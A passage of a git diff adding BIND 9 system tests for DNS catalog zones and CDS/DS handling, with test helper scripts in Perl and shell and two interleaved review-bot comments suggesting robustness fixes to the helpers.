+echo_i "reconfiguring secondary - removing non-existent catalog5 catalog zone ($n)"
+ret=0
+copy_setports ns2/named1.conf.in ns2/named.conf
+rndccmd 10.53.0.2 reconfig || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that dom12.example. is not served by secondary ($n)"
+ret=0
+wait_for_no_soa @10.53.0.2 dom12.example. dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "removing domain dom12.example. from catalog4 zone ($n)"
+ret=0
+$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1
+ server 10.53.0.1 ${PORT}
+ update delete 871d51e5433543c0f6fb263c40f359fbc152c8ae.zones.catalog4.example. 3600 IN PTR dom12.example.
+ send
+END
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+##########################################################################
+echo_i "Testing having a zone in two different catalogs"
+n=$((n+1))
+echo_i "checking that dom13.example. is not served by primary ($n)"
+ret=0
+wait_for_no_soa @10.53.0.1 dom13.example. dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "Adding a domain dom13.example. to primary ns1 via RNDC ($n)"
+ret=0
+echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom13.example.db
+echo "@ IN NS invalid."
>> ns1/dom13.example.db
+echo "@ IN A 192.0.2.1" >> ns1/dom13.example.db
+rndccmd 10.53.0.1 addzone dom13.example. '{type primary; file "dom13.example.db";};' || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that dom13.example. is now served by primary ns1 ($n)"
+ret=0
+wait_for_soa @10.53.0.1 dom13.example. dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "Adding a domain dom13.example. to primary ns3 via RNDC ($n)"
+ret=0
+echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns3/dom13.example.db
+echo "@ IN NS invalid." >> ns3/dom13.example.db
+echo "@ IN A 192.0.2.2" >> ns3/dom13.example.db
+rndccmd 10.53.0.3 addzone dom13.example. '{type primary; file "dom13.example.db";};' || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that dom13.example. is now served by primary ns3 ($n)"
+ret=0
+wait_for_soa @10.53.0.3 dom13.example. dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+
+nextpart ns2/named.run >/dev/null
+
+n=$((n+1))
+echo_i "Adding domain dom13.example. to catalog1 zone with ns1 as primary ($n)"
+ret=0
+$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1
+ server 10.53.0.1 ${PORT}
+ update add 8d7989c746b3f92b3bba2479e72afd977198363f.zones.catalog1.example. 3600 IN PTR dom13.example.
+ update add masters.8d7989c746b3f92b3bba2479e72afd977198363f.zones.catalog1.example.
3600 IN A 10.53.0.1
+ send
+END
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "waiting for secondary to sync up ($n)"
+ret=0
+wait_for_message ns2/named.run "catz: adding zone 'dom13.example' from catalog 'catalog1.example'" &&
+wait_for_message ns2/named.run "transfer of 'dom13.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+nextpart ns2/named.run >/dev/null
+
+n=$((n+1))
+echo_i "checking that dom13.example. is served by secondary and that it's the one from ns1 ($n)"
+ret=0
+wait_for_a @10.53.0.2 dom13.example. dig.out.test$n || ret=1
+grep "192.0.2.1" dig.out.test$n > /dev/null || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "Adding domain dom13.example. to catalog2 zone with ns3 as primary ($n)"
+ret=0
+$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1
+ server 10.53.0.3 ${PORT}
+ update add 8d7989c746b3f92b3bba2479e72afd977198363f.zones.catalog2.example. 3600 IN PTR dom13.example.
+ update add masters.8d7989c746b3f92b3bba2479e72afd977198363f.zones.catalog2.example. 3600 IN A 10.53.0.3
+ send
+END
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "waiting for secondary to sync up ($n)"
+ret=0
+wait_for_message ns2/named.run "catz: update_from_db: new zone merged" || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that dom13.example. is served by secondary and that it's still the one from ns1 ($n)"
+ret=0
+wait_for_a @10.53.0.2 dom13.example. dig.out.test$n || ret=1
+grep "192.0.2.1" dig.out.test$n > /dev/null || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+nextpart ns2/named.run >/dev/null
+
+n=$((n+1))
+echo_i "Deleting domain dom13.example.
from catalog2 ($n)"
+ret=0
+$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1
+ server 10.53.0.3 ${PORT}
+ update delete 8d7989c746b3f92b3bba2479e72afd977198363f.zones.catalog2.example. 3600 IN PTR dom13.example.
+ update delete masters.8d7989c746b3f92b3bba2479e72afd977198363f.zones.catalog2.example. 3600 IN A 10.53.0.3
+ send
+END
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "waiting for secondary to sync up ($n)"
+ret=0
+wait_for_message ns2/named.run "catz: update_from_db: new zone merged" || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that dom13.example. is served by secondary and that it's still the one from ns1 ($n)"
+ret=0
+wait_for_a @10.53.0.2 dom13.example. dig.out.test$n || ret=1
+grep "192.0.2.1" dig.out.test$n > /dev/null || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "Deleting domain dom13.example. from catalog1 ($n)"
+ret=0
+$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1
+ server 10.53.0.1 ${PORT}
+ update delete 8d7989c746b3f92b3bba2479e72afd977198363f.zones.catalog1.example. 3600 IN PTR dom13.example.
+ update delete masters.8d7989c746b3f92b3bba2479e72afd977198363f.zones.catalog1.example. 3600 IN A 10.53.0.2
+ send
+END
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "waiting for secondary to sync up ($n)"
+ret=0
+wait_for_message ns2/named.run "catz: update_from_db: new zone merged" || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that dom13.example. is no longer served by secondary ($n)"
+ret=0
+wait_for_no_soa @10.53.0.2 dom13.example.
dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+##########################################################################
+echo_i "Testing having a regular zone and a zone in catalog zone of the same name"
+n=$((n+1))
+echo_i "checking that dom14.example. is not served by primary ($n)"
+ret=0
+wait_for_no_soa @10.53.0.1 dom14.example. dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "Adding a domain dom14.example. to primary ns1 via RNDC ($n)"
+ret=0
+echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom14.example.db
+echo "@ IN NS invalid." >> ns1/dom14.example.db
+echo "@ IN A 192.0.2.1" >> ns1/dom14.example.db
+rndccmd 10.53.0.1 addzone dom14.example. '{type primary; file "dom14.example.db";};' || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that dom14.example. is now served by primary ns1 ($n)"
+ret=0
+wait_for_soa @10.53.0.1 dom14.example. dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "Adding a domain dom14.example. to primary ns3 via RNDC ($n)"
+ret=0
+echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns3/dom14.example.db
+echo "@ IN NS invalid." >> ns3/dom14.example.db
+echo "@ IN A 192.0.2.2" >> ns3/dom14.example.db
+rndccmd 10.53.0.3 addzone dom14.example. '{type primary; file "dom14.example.db";};' || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that dom14.example. is now served by primary ns3 ($n)"
+ret=0
+wait_for_soa @10.53.0.3 dom14.example. dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+nextpart ns2/named.run >/dev/null
+
+n=$((n+1))
+echo_i "Adding domain dom14.example. with rndc with ns1 as primary ($n)"
+ret=0
+rndccmd 10.53.0.2 addzone dom14.example.
'{type secondary; primaries {10.53.0.1;};};' || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "waiting for secondary to sync up ($n)"
+ret=0
+wait_for_message ns2/named.run "transfer of 'dom14.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+nextpart ns2/named.run >/dev/null
+
+n=$((n+1))
+echo_i "checking that dom14.example. is served by secondary and that it's the one from ns1 ($n)"
+ret=0
+wait_for_a @10.53.0.2 dom14.example. dig.out.test$n || ret=1
+grep "192.0.2.1" dig.out.test$n > /dev/null || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "Adding domain dom14.example. to catalog2 zone with ns3 as primary ($n)"
+ret=0
+$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1
+ server 10.53.0.3 ${PORT}
+ update add 45e3d45ea5f7bd01c395ccbde6ae2e750a3ee8ab.zones.catalog2.example. 3600 IN PTR dom14.example.
+ update add masters.45e3d45ea5f7bd01c395ccbde6ae2e750a3ee8ab.zones.catalog2.example. 3600 IN A 10.53.0.3
+ send
+END
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "waiting for secondary to sync up ($n)"
+ret=0
+wait_for_message ns2/named.run "catz: update_from_db: new zone merged" || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that dom14.example. is served by secondary and that it's still the one from ns1 ($n)"
+ret=0
+wait_for_a @10.53.0.2 dom14.example. dig.out.test$n || ret=1
+grep "192.0.2.1" dig.out.test$n > /dev/null || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+nextpart ns2/named.run >/dev/null
+
+n=$((n+1))
+echo_i "Deleting domain dom14.example.
from catalog2 ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.3 ${PORT} + update delete 45e3d45ea5f7bd01c395ccbde6ae2e750a3ee8ab.zones.catalog2.example. 3600 IN PTR dom14.example. + update delete masters.45e3d45ea5f7bd01c395ccbde6ae2e750a3ee8ab.zones.catalog2.example. 3600 IN A 10.53.0.3 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: update_from_db: new zone merged" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom14.example. is served by secondary and that it's still the one from ns1 ($n)" +ret=0 +wait_for_a @10.53.0.2 dom14.example. dig.out.test$n || ret=1 +grep "192.0.2.1" dig.out.test$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################################## +echo_i "Testing changing label for a member zone" +n=$((n+1)) +echo_i "checking that dom15.example. is not served by primary ($n)" +ret=0 +wait_for_no_soa @10.53.0.1 dom15.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "Adding a domain dom15.example. to primary ns1 via RNDC ($n)" +ret=0 +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom15.example.db +echo "@ IN NS invalid." >> ns1/dom15.example.db +rndccmd 10.53.0.1 addzone dom15.example. '{type primary; file "dom15.example.db";};' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom15.example. is now served by primary ns1 ($n)" +ret=0 +wait_for_soa @10.53.0.1 dom15.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +echo_i "Adding domain dom15.example. 
to catalog1 zone with 'dom15label1' label ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add dom15label1.zones.catalog1.example. 3600 IN PTR dom15.example. + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: update_from_db: new zone merged" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +sleep 3 + +n=$((n+1)) +echo_i "checking that dom15.example. is served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom15.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "Changing label of domain dom15.example. from 'dom15label1' to 'dom15label2' ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete dom15label1.zones.catalog1.example. 3600 IN PTR dom15.example. + update add dom15label2.zones.catalog1.example. 3600 IN PTR dom15.example. + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: update_from_db: new zone merged" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom15.example. is served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom15.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################################## +echo_i "Testing recreation of a manually deleted zone after a reload" +n=$((n+1)) +echo_i "checking that dom16.example. is not served by primary ($n)" +ret=0 +wait_for_no_soa @10.53.0.1 dom16.example. 
dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "Adding a domain dom16.example. to primary ns1 via RNDC ($n)" +ret=0 +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom16.example.db +echo "@ IN NS invalid." >> ns1/dom16.example.db +echo "@ IN A 192.0.2.1" >> ns1/dom16.example.db +rndccmd 10.53.0.1 addzone dom16.example. '{type primary; file "dom16.example.db";};' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom16.example. is now served by primary ns1 ($n)" +ret=0 +wait_for_soa @10.53.0.1 dom16.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "Adding domain dom16.example. to catalog1 zone with ns1 as primary ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add efe725d0cf430ffb113b9bcf59266f066a21216b.zones.catalog1.example. 3600 IN PTR dom16.example. + update add masters.efe725d0cf430ffb113b9bcf59266f066a21216b.zones.catalog1.example. 3600 IN A 10.53.0.1 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'dom16.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "transfer of 'dom16.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "checking that dom16.example. is served by secondary and that it's the one from ns1 ($n)" +ret=0 +wait_for_a @10.53.0.2 dom16.example. 
dig.out.test$n || ret=1 +grep "192.0.2.1" dig.out.test$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +echo_i "Deleting dom16.example. from secondary ns2 via RNDC ($n)" +ret=0 +rndccmd 10.53.0.2 delzone dom16.example. >/dev/null 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom16.example. is no longer served by secondary ($n)" +ret=0 +wait_for_no_soa @10.53.0.2 dom16.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +echo_i "Reloading secondary ns2 via RNDC ($n)" +ret=0 +rndccmd 10.53.0.2 reload >/dev/null 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: update_from_db: new zone merged" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom16.example. is served by secondary and that it's the one from ns1 ($n)" +ret=0 +wait_for_a @10.53.0.2 dom16.example. dig.out.test$n || ret=1 +grep "192.0.2.1" dig.out.test$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "Deleting domain dom16.example. from catalog1 ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete efe725d0cf430ffb113b9bcf59266f066a21216b.zones.catalog1.example. 3600 IN PTR dom16.example. + update delete masters.efe725d0cf430ffb113b9bcf59266f066a21216b.zones.catalog1.example. 
3600 IN A 10.53.0.1 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: update_from_db: new zone merged" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom16.example. is no longer served by secondary ($n)" +ret=0 +wait_for_no_soa @10.53.0.2 dom16.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that reconfig can delete and restore catalog zone configuration ($n)" +ret=0 +copy_setports ns2/named2.conf.in ns2/named.conf +rndccmd 10.53.0.2 reconfig || ret=1 +copy_setports ns2/named1.conf.in ns2/named.conf +rndccmd 10.53.0.2 reconfig || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +######################################################################### + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "Adding a dom19.example. to primary via RNDC ($n)" +ret=0 +# enough initial content for IXFR response when TXT record is added below +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom19.example.db +echo "@ 3600 IN NS invalid." >> ns1/dom19.example.db +echo "foo 3600 IN TXT some content here" >> ns1/dom19.example.db +echo "bar 3600 IN TXT some content here" >> ns1/dom19.example.db +echo "xxx 3600 IN TXT some content here" >> ns1/dom19.example.db +echo "yyy 3600 IN TXT some content here" >> ns1/dom19.example.db +rndccmd 10.53.0.1 addzone dom19.example. 
'{ type primary; file "dom19.example.db"; allow-transfer { key tsig_key; }; allow-update { any; }; notify explicit; also-notify { 10.53.0.2; }; };' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "add an entry to the restored catalog zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add 09da0a318e5333a9a7f6c14c385d69f6933e8b72.zones.catalog1.example. 3600 IN PTR dom19.example. + update add label1.masters.09da0a318e5333a9a7f6c14c385d69f6933e8b72.zones.catalog1.example. 3600 IN A 10.53.0.1 + update add label1.masters.09da0a318e5333a9a7f6c14c385d69f6933e8b72.zones.catalog1.example. 3600 IN TXT "tsig_key" + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'dom19.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "transfer of 'dom19.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################################## +# GL #3777 +nextpart ns4/named.run >/dev/null + +n=$((n+1)) +echo_i "Adding domain self.example. to catalog-self zone without updating the serial ($n)" +ret=0 +echo "self.zones.catalog-self.example. 3600 IN PTR self.example." >> ns4/catalog-self.example.db +rndccmd 10.53.0.4 reload || ret=1 + +n=$((n+1)) +echo_i "Issuing another rndc reload command after 1 second ($n)" +sleep 1 +rndccmd 10.53.0.4 reload || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################################## +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/cds/checkmtime.pl b/bin/tests/system/cds/checkmtime.pl new file mode 100644 index 0000000..be53584 
--- /dev/null
+++ b/bin/tests/system/cds/checkmtime.pl
@@ -0,0 +1,18 @@
+#!/usr/bin/perl
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+my $target = shift;
+my $file = shift;
+my $mtime = time - (stat $file)[9];
+die "bad mtime $mtime"
+ unless ($mtime - $target >= 0 && $mtime - $target < 60);
diff --git a/bin/tests/system/cds/checktime.pl b/bin/tests/system/cds/checktime.pl new file mode 100644
index 0000000..d85fd91
--- /dev/null
+++ b/bin/tests/system/cds/checktime.pl
@@ -0,0 +1,27 @@
+#!/usr/bin/perl
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+use strict;
+use warnings;
+
+my $target = shift;
+my $notbefore;
+my $inception;
+while (<>) {
+ $notbefore = $1 if m{^.* must not be signed before \d+ [(](\d+)[)]};
+ $inception = $1 if m{^.* inception time \d+ [(](\d+)[)]};
+}
+die "missing notbefore time" unless $notbefore;
+die "missing inception time" unless $inception;
+my $delta = $inception - $notbefore;
+die "bad inception time $delta" unless abs($delta - $target) <= 10;
diff --git a/bin/tests/system/cds/clean.sh b/bin/tests/system/cds/clean.sh new file mode 100644
index 0000000..b9743a5
--- /dev/null
+++ b/bin/tests/system/cds/clean.sh
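Review bot: In checkmtime.pl the result of `stat $file` is indexed without checking that the call succeeded, so a missing or unreadable file gives an undefined mtime and the script dies with a misleading `bad mtime` that carries the current epoch time instead of naming the real problem. Check the call first, e.g. `my @st = stat $file or die "cannot stat $file: $!";`, and compute the age from `$st[9]`. The script also lacks the `use strict; use warnings;` pair that the sibling checktime.pl in this commit declares; adding it would surface the undefined value as a warning.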
@@ -0,0 +1,23 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f CDNSKEY* CDS* DS*
+rm -f K*
+rm -f UP*
+rm -f brk.*
+rm -f db.*
+rm -f dsset-*
+rm -f empty
+rm -f sig.*
+rm -f vars.sh
+rm -f err* out* xerr xout
diff --git a/bin/tests/system/cds/mangle.pl b/bin/tests/system/cds/mangle.pl new file mode 100644
index 0000000..9268cc0
--- /dev/null
+++ b/bin/tests/system/cds/mangle.pl
@@ -0,0 +1,19 @@
+#!/usr/bin/perl
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+my $re = $ARGV[0];
+shift;
+while (<>) {
+ s{($re)........}{${1}00000000};
+ print;
+}
diff --git a/bin/tests/system/cds/setup.sh b/bin/tests/system/cds/setup.sh new file mode 100644
index 0000000..6e3197d
--- /dev/null
+++ b/bin/tests/system/cds/setup.sh
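Review bot: mangle.pl passes its input through unchanged when the pattern taken from `$ARGV[0]` never matches, so a fixture that was meant to be corrupted can silently stay valid. That matters for the cases in cds/tests.sh that expect success with a mangled input (`one mangled DS`, `mangle RRSIG CDS by ZSK`), which would pass just as well against an unmangled file. Count the substitutions and fail when there were none: declare `my $hits = 0;`, use `$hits += s{($re)........}{${1}00000000};` inside the loop, and add `die "pattern '$re' did not match\n" unless $hits;` after it.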
@@ -0,0 +1,133 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+set -e
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+set -u
+
+touch empty
+
+Z=cds.test
+
+keyz=$($KEYGEN -q -a $DEFAULT_ALGORITHM $Z)
+key1=$($KEYGEN -q -a $DEFAULT_ALGORITHM -f KSK $Z)
+key2=$($KEYGEN -q -a $DEFAULT_ALGORITHM -f KSK $Z)
+
+idz=$(keyfile_to_key_id $keyz)
+id1=$(keyfile_to_key_id $key1)
+id2=$(keyfile_to_key_id $key2)
+
+cat <<EOF >vars.sh
+Z=$Z
+key1=$key1
+key2=$key2
+idz=$idz
+id1=$id1
+id2=$id2
+EOF
+
+tac() {
+ $PERL -e 'print reverse <>'
+}
+
+convert() {
+ key=$1
+ n=$2
+ $DSFROMKEY -12 $key >DS.$n
+ grep " ${DEFAULT_ALGORITHM_NUMBER} 1 " DS.$n >DS.$n-1
+ grep " ${DEFAULT_ALGORITHM_NUMBER} 2 " DS.$n >DS.$n-2
+ sed 's/ IN DS / IN CDS /' <DS.$n >>CDS.$n
+ sed 's/ IN DNSKEY / IN CDNSKEY /' <$key.key >CDNSKEY.$n
+ sed 's/ IN DS / 3600 IN DS /' <DS.$n >DS.ttl$n
+ sed 's/ IN DS / 7200 IN DS /' <DS.$n >DS.ttlong$n
+ tac <DS.$n >DS.rev$n
+}
+convert $key1 1
+convert $key2 2
+
+# consistent order wrt IDs
+sort DS.1 DS.2 >DS.both
+
+cp DS.1 DS.inplace
+$PERL -we 'utime time, time - 7200, "DS.inplace" or die'
+
+mangle="$PERL mangle.pl"
+
+$mangle " IN DS $id1 ${DEFAULT_ALGORITHM_NUMBER} 1 " <DS.1 >DS.broke1
+$mangle " IN DS $id1 ${DEFAULT_ALGORITHM_NUMBER} 2 " <DS.1 >DS.broke2
+$mangle " IN DS $id1 ${DEFAULT_ALGORITHM_NUMBER} [12] " <DS.1 >DS.broke12
+
+sed 's/^/update add /
+$a\
+send
+' <DS.2 >UP.add2
+
+sed 's/^/update del /
+$a\
+send
+' <DS.1 >UP.del1
+
+cat UP.add2 UP.del1 | sed 3d >UP.swap
+
+sed 's/ add \(.*\) IN DS / add \1 3600 IN DS /' <UP.swap >UP.swapttl
+
+sign() {
+ cat >db.$1
+ $SIGNER >/dev/null \
